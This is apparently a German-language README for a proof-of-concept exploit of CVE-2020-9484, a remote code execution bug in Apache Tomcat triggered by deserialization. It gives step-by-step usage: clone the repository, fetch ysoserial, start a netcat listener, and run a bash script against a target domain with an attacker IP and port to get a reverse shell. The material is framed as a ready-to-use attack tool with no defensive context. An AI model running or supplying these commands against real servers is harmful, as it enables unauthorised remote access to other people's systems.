
POC für CVE-2020-9484
POC für CVE-2020-9484
Apache Tomcat RCE durch Deserialisierung (CVE-2020-9484)
Dokumentation ansehen »
1. Klone dieses Repository, dann kannst du CVE-2020-9484 verwenden und bei Bedarf den Quellcode ändern.
2. Lade das ysoserial-JAR herunter
3. Lege sowohl CVE-2020-9484 als auch ysoserial.jar in dasselbe Verzeichnis
4. Öffne eine Shell!
Ein einfaches Bash-Skript wurde geschrieben, um die Verwendung von CVE-2020-9484 zu vereinfachen.
Für die Exploitation benötigst du einen bereitstehenden Netcat-Listener
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
